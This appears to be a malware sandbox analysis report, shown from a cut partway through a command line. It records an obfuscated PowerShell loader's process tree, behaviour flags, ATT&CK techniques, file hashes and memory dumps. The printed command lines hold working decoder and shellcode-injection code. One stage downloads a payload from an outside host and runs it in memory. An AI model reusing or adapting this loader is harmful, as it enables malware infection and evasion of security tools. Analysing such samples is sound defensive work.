Sk'ko5He2It3Mo0Ku1StFHa1CaAAr1fi3mo0No4bo5Kr6Al4ToBMa5Bh6Ca2TrDUn2Re5Co0UnFMo0Ad5Me0Qu2Om1Sm3Qu1PhBAs5Bl8No2Ju4Un0Ma3pr1Ot8St0Ko2No1anFRe1SaBCo1de3Ud5Dk8Ti3FoFbe1Pl8Bo0Bu2Ta1Hu3Su0In4Su1Tr9Tr0Fo6Sa2sk5Fd1Du3Ku0de4Fo0Co0Ug1feFPe1Tr5Gt1il3Do0fe5Me5Re8Ca3KoBBa1Ou7Pe0En4Ef0In5In1FrERe1Cr7No1StAPa2EfBSi4TrCAn4YdCPr3Em1Af1Er3Un0Be2Co3Sm2Be1Un3Ve1maACa1Un3Pr1De1Ne1So7Gr0me2Bo1Ex3Pr3Se0me1Fr9Gr0Pr4Tr3Cy0Va0Bo3Dk1Qu8Ro1Fo5Fl0Th2Pe1WhFEn1Fl9In1Is8fr2Li6In1Gl9St1flFSm1Se8Ac0An2Sn1Br3Sk0Sk4Or5UtEEi5SpEOp1Da0Se1KaDIn0Dd6Re5Ba6Pi5An2Fe2ic3Ov1Ko2Os0ib5Di1SpDSu0Kl4Na1NyFfo4Ba0Ve4St3Re5Co6Sq5No2Ad2Ha5ko1Co3Un0Ac4Op0De2Pr0Ti3Fo1SuBSa1Jo2To1AfFSm0Vi6En4Ka2Cr5AnFUn5UdAOu5Ph6Te5brEBa3Sl1Fr3Fo2Sl2Pi2Pe5he6No3La6Ud5KoEFo2GeDUn3stFLe1De8So0Ri2Sc2No6Au0Ru2Ux0Sy4Hu2CiBUn5peAPs5te6Op2SlDSt2ld3Dg3ReFRi1Pa8Su0Tr2Wi4Ma5St4Co4Bu2OvBtr5MiAFi5St6Ta2BiDAf2Be3As3ViFSe1Se8ul0bo2Ji4Am5Sa4Om4Ag2SuBGa5CrAIs5Tr6Be2TrDKa2Re3Sk3InFpo1Ov8Co0pe2Th4In5Sl4Hi4ox2HeBSk5KlFPr5St6El5NeECo2SaDLe3ChFAg1Un8Sp0Zo2Ae2Do6To0Au2Du0ov4Pa2KeBPe5EsFHu5SoFSn5BaFAn'kn;Co&Sa(ca`$NoSOzeTirFutInuInmSudAuiOfpUd7De)ro Ha`$OvOSprVagNiaMenMuiAfsSpaHotSt6Sn;Sp`$StITrnRecInlSm Fo=Ar ShfZakBrpCi Ji`$ImSPleDirSttFouunmRudCyiTipSl5He Be`$EuSReeTyrAftWaugamThdKoiObpMy6Sk;Ch`$IlOBrrPegHyaManLeiDosExaFatRh7Go Ba=Va MaDWheskcAaoPrlSsoInrBlaBonBe0Di2La Be'Bo5Kl2Bu3gl0Re1CoFAu1RaAUn0Li2Tr1SiEUn1AnFBr4Be5Sn5em6Se4RaBOc5Co6No5Ud2In3So0Li1reFMu1GoAor1Re3Sv0Mi4He5De8Co3JoFYa1Mo8Am0Re0Re1Fi9Ue1biDDi1Cy3St5LiEKi2UdDMa3PoFEr1Kl8Se0Bl2Pi2Pa6fo0Lu2Ti0Sp4Dr2ZiBNo4BeCFe4UtCBy2BrCMe1Ap3Su0Fa4Ud1Br9Je5ShAFa5Va6Ej4De0Ra4Hu2Me4Un4Un5GtANo5Sl6Me4Do6En0HdEag4Un5Bl4Ch6Fu4Ti6In4Ju6Pe5RoAko5Ce6Dy4Vo6Al0SiESt4Pe2St4Em6St5LyFSe'Fo;Af&Ga(Hu`$MoSDieHarVatSeuGamTrdboiTtpPi7Mo)Re Fl`$spOAbrAtgfoafonToiStsNeaSutRe7Po;fi`$SkOForKogBlaBynFliExsSpaKatHo8Ne Un=Va UdDDeeUdcPooOtlCioRerAfaTrnVe0Ca2In Sa'Gr5Se2Ha2Vr5Sk0Kd0Un1HjFEl1Mo8Tr1BiDLa1Si3Or0Se4an1KaFSn5Re6Ka4FoBTh5Br6Sh5Dr2El3Zi0Pa1BrFTj1SkALe1Po3So0Ge4Si5Mi8tr3poFal1Be8De0Dr0St1Fr9Af1AnDSy1Ne3Fo5DuEPr2DoDKr3BlFFl1Ne8ih0Ma2bi2Ge6La0Bu2Ke0St4Pa2cuBWi4JeCHo4SeCRd2ElCPr1Sa3St0Pa4Rh1Bi9Hu5FoAVi5Bu6Bo4Ch1En4Fd7Sk4Bi5Sk4AnFMa4Ti1Ho4Se5Fo4Be1Ur4ja0Co5FrAHe5Fr6Re4Ko6La0CrEKo4te5Lr4Ci6Te4Br6Ba4su6Du5DdAEr5Ti6Be4Tv6Sk0UnEFl4St2Su5JoFTo'Ba;Im&Wa(Se`$MiSIneStrUdtMouStmUndEfiArpHe7Sh)Li Ch`$AfOPrrFogNeaChnDyiWrsFeaPetGe8Be;Kn`$InDHaeSucReoLelAfoImrSyaDanEn0Ou1tu Tr=Ja Ti'KlhSstKotFrpEn:Pa/bl/GamSueElgReoFooMakDibDupUnnPrqDu.FocMyfRe/caKopvEliPenSr.BysTanAbpRa'De;Re`$NaDMeeOccSaoDulSpoberTraUnnma0Ge0Ch Bi=So WhDHyeMacRooKalTroDgrRuaSmnAr0Ep2Gr Be'Pr5op2Ve2Un4Ha0kn3Be1St2Fr1Pe3sk1OmDSu0wh3Dr0Ch0Ca1Da3Nr5Hu6Ir4kaBHa5La6Op5FeEEf3Sa8Fo1Wi3Sj0Gr1Hy5AcBJe3pa9Ra1My4Pr1NoCBe1Ba3Sk1Fo5In0Co2Bo5Gi6Ka3Fl8ta1Ko3Re0No2da5Sy8Mu2ba1Pr1So3Ma1Pr4Pa3Co5la1fiAUn1InFAq1Si3re1Sc8Dk0Al2Es5StFBu5Kn8Be3Be2Ro1Va9In0Mo1Re1So8In1deAKu1As9Sk1Es7Ca1To2St2En5ch0In2Mo0Di4Ki1SeFNi1Au8Sn1Fr1Bo5NiESp5Ga2va3Bo2Br1hi3In1Aa5St1ge9af1SkAVg1Br9Is0Bi4Sp1br7Ro1De8L 4Es6Pi4Mo7Fi5CaFDd'Gy;Sk`$ReODarkigSaaFlnkliMasSnaFittr8Co Me=Go DeDPueStcAnoColSlojurReaSknDa0al2Si Au'Po5Op2Sy3Al0Ot1miFUn1PeALi0Ba2De1KoETo1brFDe4Bf4Da4GrBAp5Es2Ki1Sa3By1Fo8Sk0Ap0Di4AgCAn1Ae7ca0Pl6Ch0Mo6sm1Ta2Co1Pn7Ga0fo2Wi1Hy7Ir'Em;gr&Tu(Ha`$BdSHaeCerSktPruSymVedSmiSapDi7Ch)Af Do`$ElOforKegSaaKonSliSjsDeaCrtNy8Te;Pr`$BrFspiDolTptTihAbiBo2To=Ru`$CuFPeiKolFatFrhSkiaf2Br+mo'Ta\PoBRenFokTieravBiaEr.RedEkaLstPa'Ti;re`$UnRUnuPadaleFukHjuSvvFrePr=Am'Na'Th;UgiTefHy un(Ph-GunFroSptUv(UnTSkeFusPrtCa-UnPHeaIntNohKa Sp`$alFTeiSylBetFahEriUn2Bd)Sv)Ce Af{FowGahAniRelLieSm Af(Ve`$LiROcuHidKneObkScunovMiePa Ar-OveFoqBl Bu'Fo'Ka)Fo Fo{Ou&Me(Sy`$CoSNoePrrGetInuMamSudDeiPrpOp7De)Re Sk`$ScDBoeIdcProOplNooKlrGaaInnFl0Fo0Te;ReSGytJuaPrrNotUd-OuSbulTieBeeTepar Th5Ha;As}DeScoeAutSu-OsCUdoSonHutBueBanRotcr Bu`$PtFBriFelTitPuhReiAd2Io Im`$FrRKruMudpaeRakFiuRevSieSy;Fe}Re`$MuRLouEldHveUdkCouPrvLeeJg Ov=Ex koGuneDotBe-LoCUdoSqnChtMeeRunBrtma Br`$ErFdbiRtlRitGahTeiTe2Pl;Pr`$BlOInrRagMeabjnFriArsSkaFitEx9Pu re=Gr GrDAmeOvcNooSklMaoRvrVaaHonSn0He2St fe'Zo5Se2Ox3Em9Ov0tj4Sh1Aa1Io1Ud7Ch1Do8Gu1unFRi0Me5Be1lg7Ud0No2Re5Un6Tr4SkBVa5Sl6He2LoDUn2Sk5Wi0RaFVi0he5Pr0Kl2Un1Ru3Fi1UnBPe5Ad8Un3ex5Ov1Ma9Dr1Be8St0En0Ma1To3Ad0Fi4Fl0Br2Sk2FoBBa4HeCPs4BaCVr3Ep0Lu0Ek4St1Rd9Sk1ArBsk3re4De1ti7Me0Gr5To1Ka3Ca4De0Fr4Oc2Mo2Xy5Up0Dd2pl0Dr4Hu1coFRa1Un8Em1Ba1Pa5haEFo5Un2Un2Ha4at0Il3Ll1Un2Re1Au3De1SnDFu0Tm3ca0pe0Al1By3Ma5suFSu'Se;Ma&Po(Ud`$BrSTeeBarCutBeuCemChdBaiFlpVa7Sl)Un Re`$FoOUnrPlgHaaUdnBeiHisFiaPhtTr9Fo;Mi`$LaRInuStdFreTikPeukavVeeHj0Ga Ot=Eu VaDFoeKlcThoTrlVooOurUnaEnnMi0Sl2Va Sn'En2StDCa2Fr5Gl0EmFKa0Br5Sa0To2Su1St3in1LaBFu5Ti8Sp2Ko4Ki0Sn3kv1Ho8Ru0Sl2Fo1RaFOv1reBKo1Ek3Br5Hy8Ku3KaFHo1Po8Pe0Bl2Vi1Ba3ve0Me4No1Mo9ti0Di6Dr2Fo5Kk1sa3Un0Be4Ov0So0sp1SmFTi1Ta5Gr1Ku3in0Mu5Be5Cy8Af3CoBNo1Sy7ko0Hr4Ma0Ve5ta1FaESt1Ba7Fl1BeASu2NoBMe4BuCSh4ReCIm3Pl5Fo1sf9Sl0Ty6Be0MoFPr5TeEKr5Ba2Sa3Ha9po0Ob4Mo1Ev1Bo1Sp7Po1Do8Si1CaFEt0Ar5Da1Cr7so0Un2fo5FjAEp5Bl6St4dg6te5WiAle5Ov6Pl5Ba6fa5Fa2Un3Re0Mo1muFPe1VeAOk0Gu2Re1KuEfo1ElFIm4Pr5No5RaAOb5Gy6Co4Be0Dr4Se2Al4Af4St5SaFDe'Me;Lu&In(Is`$ErSBrerarMutNeuSomvvdHaiTrpFo7Le)Ni Sp`$SpRTuuNadKreSukbouNovByeRe0Un;ar`$meCUnhChlbeoFerOmiCacFrpEv=No`$HjOFerGaganaHenSaiClsKaamdtRe.SicInoAnuAfnSktVi-Ko6Zy4Fr2Rr;Di`$PrRBeuRedreePrkemuInvFieSt1Va Mu=mo SuDFreTacSooHjlPioKirTaaEgnOm0ov2Si Re'De2OpDhe2Pa5In0anFPu0Ba5Ko0Da2ol1Fu3Pa1ToBPs5Pl8Gr2Op4Ba0Rr3Be1Gl8He0Sa2Tr1HuFoc1PyBEk1Gr3sp5Al8In3OrFMl1Bu8Il0to2Ca1Di3Et0Wh4St1Li9Om0Go6Ma2Mi5Pa1Re3ge0Sv4Hj0Un0Un1KaFGe1Ka5En1Ha3Cr0Mi5Re5En8Pr3GaBBe1Fi7Pu0Br4Ro0In5Sk1LiERe1Ug7Ha1VaAPr2TeBre4BeCYo4FiCre3Du5Tu1Co9Ga0Ba6Ga0AfFVa5TeEAs5bl2th3El9Oc0Sp4Re1La1Ki1Hy7Un1Mi8Sr1ReFAn0Mo5Op1Ta7Am0Gr2De5OvAIr5hy6Sd4Sl0Dr4Bl2Tu4Ju4Sl5TeAHo5Ef6De5Ud2Gr2Ju5Ri0Ba0Id1anFCi1Di8Di1PaDBe1Tu3Fo0Pr4No1FlFAl5RuAId5Ci6Go5Pr2ko3By5Di1GeEBa1NyACo1ge9Ly0No4St1FiFEx1fr5Bu0ju6Fo5FiFFo'Te;Ab&Jo(Un`$VoSSueStrEftEpuchmStdMeiPrpTa7Fo)sy Ba`$ExRPouNodKoeRikNeuVivLoeEn1Ud;ud`$LiRSauGldKleTrkRluAavAbeRe2Di Be=Ge ViDSkeVecLooRelEloSkrKuaDenBo0Bu2Ph Hy'Lo5me2un3TjBDe1Su3De1Sa1Ph1Ga7Tr5Tr6Be4UdBBr5Sl6un2RiDTf2st5Ov0DeFCo0Ku5Qu0Im2ch1Ga3Ax1AcBTi5Am8Ud2Ba4Se0Se3Be1My8Kn0Ez2Br1boFUd1DeBNo1Ha3ca5ho8Be3SpFQu1un8Vi0Kn2Pe1Co3Sh0Ho4Hy1Sp9Ka0Sl6Wh2Ba5Di1Mi3Un0Af4br0Ku0La1MeFNi1ha5Ni1Si3St0Ce5My5Er8Ta3SkBUn1Na7Ad0Un4Ga0Al5Hu1ToEMa1Re7Sp1ImASc2SvBCl4CoCGe4OpCFr3In1ra1Sp3gr0Ox2Un3Ch2Tr1Ma3In1BrASt1Ae3So1Hj1Pl1Ny7Pa0Te2Ta1Mi3Ni3Ud0Ca1Ca9Di0ch4up3Ka0Ay0Un3Sa1Ov8Fr1St5Sa0Br2De1JaFEl1Ma9Fo1Wa8Du2He6So1Hj9Bi1StFba1Ap8Sa0Go2St1Pi3To0Br4Pr5MoETi5CaEBe1An0Br1liDPu0Sl6Sp5Ho6El5Cl2Sl3Ma9Mu1Ou2Vi1TaFUr1trAMc1Un9Co1jaBMh1ek3Co1Sk2Mr5Tr6Ta5Ve2Qu2Gr4Dr1Un3Mi0Ve6ha0In4Pu1Ef9De1Sp1Wi0Af4Te1Br7An1flBTr0Li5Be5ReFTr5FrAhr5fo6Br5BrEsa3cr1Re3Th2Fi2Ty2Pa5Me6Ha3Ko6Ad5afEhy2UoDRe3ApFSe1ju8Na0Co2Om2Ba6Mo0Op2Pr0Al4Ma2LuBst5PhADr5Mo6op2MaDTe3SpFDe1Ga8Cr0Ja2Br2Du6sc0un2Bu0Kn4Er2ReBCo5nsADi5As6Te2BeDOv3FrFHe1Wo8Mu0ra2Uf2Fe6Dy0Sp2Sp0Mi4Ru2StBOu5PoACl5Ba6co2BeDfe3GoFMe1Si8Lo0Sa2Ir2Ur6An0Pl2En0St4Br2blBVi5MaAGr5jg6Ti2FiDte3TeFUn1Sp8Lo0In2Ka2Lu6Ba0Sy2Ba0Un4Lu2SeBAl5MoFBr5Ve6Bo5SkEIn2ViDFl3RkFPo1In8Fa0Sa2Mi2Pr6Sn0Pa2Re0Sk4Re2SkBFa5ThFka5SyFKu5KeFnu'Us;Fo&Fi(Ud`$SaSKaeGgrAntInuRomSudApiBrpSt7An)Ga Po`$CaRFluSpdGaeTrkInuJovPeeAf2De;Bl`$SpRmauLydTheBakaguBevTieHv3Pl Na=Mi FaDAfeShcVaoKolKuoLarThaGenMd0Ch2Os ya'Aa5Me2Co3AaBSp1Ly3Ob1Da1Sp1Re7De5Do8Nu3PoFSc1Or8An0St0Af1Vk9Tu1HaDSe1Ko3Ke5ChENo5Ha2Re3Bl0Me1FoFMy1PrASy0In2Sh1HyEbe1MaFRb4Va5sw5FoABa5Sk2Ac2Tr5Fa0Kv0Fo1DiFBr1Un8Co1IlDsk1Re3Bu0Fr4fa1UrFFa5TaAdi5Pr2so3stFFo1In8Pe1Bo5Re1DeAUl5AuAOy4No6Wr5PrAIm4to6Nd5KrFkr'Dr;Ch&Nu(Kb`$FoSToeFirUrtTruOvmAfdmaiHapSl7Un)He th`$ArRFauSydaceInkTkuInvUneHa3Fr#Pr;""";Function Rudekuve9 ([String]$Reproduc) { For($Bagva=2; $Bagva -lt $Reproduc.Length-1; $Bagva+=(2+1)){$Decoloran = $Decoloran + $Reproduc.Substring($Bagva, 1)}; $Decoloran;}$Udnyt0 = Rudekuve9 'OvIEiELiXAk ';$Udnyt1= Rudekuve9 $Overnu;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Udnyt1 ;}else{&$Udnyt0 $Udnyt1;}"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:528

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Decoloran02 { param([String]$Reproduc); $Tannog = ''; Write-Host $Tannog; Write-Host $Tannog; Write-Host $Tannog; $Choke = New-Object byte[] ($Reproduc.Length / 2); For($Bagva=0; $Bagva -lt $Reproduc.Length; $Bagva+=2){ $Choke[$Bagva/2] = [convert]::ToByte($Reproduc.Substring($Bagva, 2), 16); $Choke[$Bagva/2] = ($Choke[$Bagva/2] -bxor 118); } [String][System.Text.Encoding]::ASCII.GetString($Choke);}$Chut0=Decoloran02 '250F0502131B58121A1A';$Chut1=Decoloran02 '3B1F1504190519100258211F184544582318051710133817021F00133B13021E191205';$Chut2=Decoloran02 '3113022604191537121204130505';$Chut3=Decoloran02 '250F0502131B58240318021F1B13583F180213041906251304001F151305583E1718121A13241310';$Chut4=Decoloran02 '0502041F1811';$Chut5=Decoloran02 '3113023B1912031A133E1718121A13';$Chut6=Decoloran02 '2422250613151F171A38171B135A563E1F1213340F251F115A562603141A1F15';$Chut7=Decoloran02 '240318021F1B135A563B171817111312';$Chut8=Decoloran02 '2413101A131502131232131A1311170213';$Chut9=Decoloran02 '3F183B131B19040F3B1912031A13';$Sertumdip0=Decoloran02 '3B0F32131A1311170213220F0613';$Sertumdip1=Decoloran02 '351A1705055A562603141A1F155A562513171A13125A563718051F351A1705055A5637030219351A170505';$Sertumdip2=Decoloran02 '3F1800191D13';$Sertumdip3=Decoloran02 '2603141A1F155A563E1F1213340F251F115A56381301251A19025A56201F040203171A';$Sertumdip4=Decoloran02 '201F040203171A371A1A1915';$Sertumdip5=Decoloran02 '1802121A1A';$Sertumdip6=Decoloran02 '380226041902131502201F040203171A3B131B19040F';$Sertumdip7=Decoloran02 '3F332E';$Sertumdip8=Decoloran02 '2A';$Odilomed=Decoloran02 '232533244544';$Reprograms=Decoloran02 '35171A1A211F181219012604191537';function fkp {Param ($Enditin, $cerebrat) ;$Organisat0 =Decoloran02 '52311714131812031B564B565E2D37060632191B171F182B4C4C3503040413180232191B171F1858311302370505131B141A1F13055E5F560A56211E1304135B39141C131502560D56522958311A1914171A370505131B141A0F3517151E13565B371812565229583A191517021F19185825061A1F025E5225130402031B121F064E5F2D5B472B58330703171A055E52351E0302465F560B5F58311302220F06135E52351E0302475F';&($Sertumdip7) $Organisat0;$Organisat5 = Decoloran02 '52250F1802171D050204564B5652311714131812031B583113023B13021E19125E52351E0302445A562D220F06132D2B2B56365E52351E0302455A5652351E0302425F5F';&($Sertumdip7) $Organisat5;$Organisat1 = Decoloran02 '0413020304185652250F1802171D050204583F1800191D135E5218031A1A5A56365E2D250F0502131B58240318021F1B13583F180213041906251304001F151305583E1718121A132413102B5E3813015B39141C13150256250F0502131B58240318021F1B13583F180213041906251304001F151305583E1718121A132413105E5E3813015B39141C131502563F18022602045F5A565E52311714131812031B583113023B13021E19125E52351E0302435F5F583F1800191D135E5218031A1A5A56365E523318121F021F185F5F5F5F5A565215130413140417025F5F';&($Sertumdip7) $Organisat1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Algeris230,[Parameter(Position = 1)] [Type] $Svajendep = [Void]);$Organisat2 = Decoloran02 '523A17140F04564B562D37060632191B171F182B4C4C3503040413180232191B171F18583213101F1813320F18171B1F15370505131B141A0F5E5E3813015B39141C13150256250F0502131B582413101A1315021F191858370505131B141A0F38171B135E52351E03024E5F5F5A562D250F0502131B582413101A1315021F191858331B1F0258370505131B141A0F34031F1A1213043715151305052B4C4C2403185F583213101F1813320F18171B1F153B1912031A135E52351E03024F5A565210171A05135F583213101F1813220F06135E5225130402031B121F06465A565225130402031B121F06475A562D250F0502131B583B031A021F1517050232131A13111702132B5F';&($Sertumdip7) $Organisat2;$Organisat3 = Decoloran02 '523A17140F04583213101F181335191805020403150219045E52351E0302405A562D250F0502131B582413101A1315021F19185835171A1A1F1811351918001318021F1918052B4C4C25021718121704125A5652371A1113041F054445465F582513023F1B061A131B13180217021F1918301A1711055E52351E0302415F';&($Sertumdip7) $Organisat3;$Organisat4 = Decoloran02 '523A17140F04583213101F18133B13021E19125E5225130402031B121F06445A565225130402031B121F06455A56522500171C13181213065A5652371A1113041F054445465F582513023F1B061A131B13180217021F1918301A1711055E52351E0302415F';&($Sertumdip7) $Organisat4;$Organisat5 = Decoloran02 '04130203041856523A17140F0458350413170213220F06135E5F';&($Sertumdip7) $Organisat5 ;}$Udskri65 = Decoloran02 '1D130418131A4544';$Organisat6 = Decoloran02 '52301F1A1304564B562D250F0502131B58240318021F1B13583F180213041906251304001F151305583B1704051E171A2B4C4C31130232131A131117021330190430031815021F191826191F180213045E5E101D0656522312051D041F4043565225130402031B121F06425F5A565E31322256365E2D3F18022602042B5A562D233F180245442B5A562D233F180245442B5A562D233F180245442B5F565E2D3F18022602042B5F5F5F';&($Sertumdip7) $Organisat6;$Incl = fkp $Sertumdip5 $Sertumdip6;$Organisat7 = Decoloran02 '52301F1A021E1F45564B5652301F1A1304583F1800191D135E2D3F18022602042B4C4C2C1304195A564042445A56460E454646465A56460E42465F';&($Sertumdip7) $Organisat7;$Organisat8 = Decoloran02 '5225001F181D13041F564B5652301F1A1304583F1800191D135E2D3F18022602042B4C4C2C1304195A564147454F414541405A56460E454646465A56460E425F';&($Sertumdip7) $Organisat8;$Decoloran01 = 'http://megookbpnq.cf/Kvin.snp';$Decoloran00 = Decoloran02 '52240312131D030013564B565E3813015B39141C1315025638130258211314351A1F1318025F58321901181A1917122502041F18115E52321315191A1904171846475F';$Organisat8 = Decoloran02 '52301F1A021E1F444B521318004C17060612170217';&($Sertumdip7) $Organisat8;$Filthi2=$Filthi2+'\Bnkeva.dat';$Rudekuve='';if (-not(Test-Path $Filthi2)) {while ($Rudekuve -eq '') {&($Sertumdip7) $Decoloran00;Start-Sleep 5;}Set-Content $Filthi2 $Rudekuve;}$Rudekuve = Get-Content $Filthi2;$Organisat9 = Decoloran02 '5239041117181F051702564B562D250F0502131B58351918001304022B4C4C3004191B3417051340422502041F18115E52240312131D0300135F';&($Sertumdip7) $Organisat9;$Rudekuve0 = Decoloran02 '2D250F0502131B58240318021F1B13583F180213041906251304001F151305583B1704051E171A2B4C4C3519060F5E5239041117181F0517025A56465A565652301F1A021E1F455A564042445F';&($Sertumdip7) $Rudekuve0;$Chloricp=$Organisat.count-642;$Rudekuve1 = Decoloran02 '2D250F0502131B58240318021F1B13583F180213041906251304001F151305583B1704051E171A2B4C4C3519060F5E5239041117181F0517025A564042445A565225001F181D13041F5A5652351E1A19041F15065F';&($Sertumdip7) $Rudekuve1;$Rudekuve2 = Decoloran02 '523B131117564B562D250F0502131B58240318021F1B13583F180213041906251304001F151305583B1704051E171A2B4C4C31130232131A131117021330190430031815021F191826191F180213045E5E101D06565239121F1A191B1312565224130604191104171B055F5A565E31322256365E2D3F18022602042B5A562D3F18022602042B5A562D3F18022602042B5A562D3F18022602042B5A562D3F18022602042B5F565E2D3F18022602042B5F5F5F';&($Sertumdip7) $Rudekuve2;$Rudekuve3 = Decoloran02 '523B131117583F1800191D135E52301F1A021E1F455A5225001F181D13041F5A523F18151A5A465A465F';&($Sertumdip7) $Rudekuve3#"
3⤵
- Blocklisted process makes network request
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1400

C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
4⤵
PID:1724

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
378d7ddcf9eb9da807cb0f5468581d96

SHA1
46eb926dd37a0f26f4763357760517c45f1ef57d

SHA256
38db0982142d36ee1df162312a9f3a5cc7d28a0fb07e82a1a9e0ae24066ef3ed

SHA512
160a7bca111f78d8a70e2131342a5f9738b0beed11bca625ca014a213d606322a94dd65ba486c0e673d9f61299beeb227281647acca8aebb123c227d7fc41607

Download Submit
memory/528-62-0x0000000000000000-mapping.dmp

Download
memory/528-75-0x00000000028F4000-0x00000000028F7000-memory.dmp

Filesize
12KB

Download
memory/528-73-0x00000000028FB000-0x000000000291A000-memory.dmp

Filesize
124KB

Download
memory/528-70-0x000000001B8E0000-0x000000001BBDF000-memory.dmp

Filesize
3.0MB

Download
memory/528-69-0x00000000028F4000-0x00000000028F7000-memory.dmp

Filesize
12KB

Download
memory/528-68-0x000007FEF3180000-0x000007FEF3CDD000-memory.dmp

Filesize
11.4MB

Download
memory/528-67-0x000007FEF3DA0000-0x000007FEF47C3000-memory.dmp

Filesize
10.1MB

Download
memory/752-60-0x000000001B770000-0x000000001BA6F000-memory.dmp

Filesize
3.0MB

Download
memory/752-56-0x000007FEFBF61000-0x000007FEFBF63000-memory.dmp

Filesize
8KB

Download
memory/752-63-0x0000000002924000-0x0000000002927000-memory.dmp

Filesize
12KB

Download
memory/752-55-0x0000000000000000-mapping.dmp

Download
memory/752-58-0x000007FEEE320000-0x000007FEEEE7D000-memory.dmp

Filesize
11.4MB

Download
memory/752-59-0x0000000002924000-0x0000000002927000-memory.dmp

Filesize
12KB

Download
memory/752-57-0x000007FEF3BB0000-0x000007FEF45D3000-memory.dmp

Filesize
10.1MB

Download
memory/752-64-0x000000000292B000-0x000000000294A000-memory.dmp

Filesize
124KB

Download
memory/1400-72-0x0000000076771000-0x0000000076773000-memory.dmp

Filesize
8KB

Download
memory/1400-71-0x0000000000000000-mapping.dmp

Download
memory/1400-74-0x00000000737D0000-0x0000000073D7B000-memory.dmp

Filesize
5.7MB

Download
memory/1400-76-0x00000000737D0000-0x0000000073D7B000-memory.dmp

Filesize
5.7MB

Download
memory/1400-77-0x0000000005A00000-0x0000000009E17000-memory.dmp

Filesize
68.1MB

Download
memory/1400-79-0x00000000776E0000-0x0000000077889000-memory.dmp

Filesize
1.7MB

Download
memory/1400-80-0x00000000778C0000-0x0000000077A40000-memory.dmp

Filesize
1.5MB

Download
memory/1400-82-0x00000000778C0000-0x0000000077A40000-memory.dmp

Filesize
1.5MB

Download
memory/1808-54-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing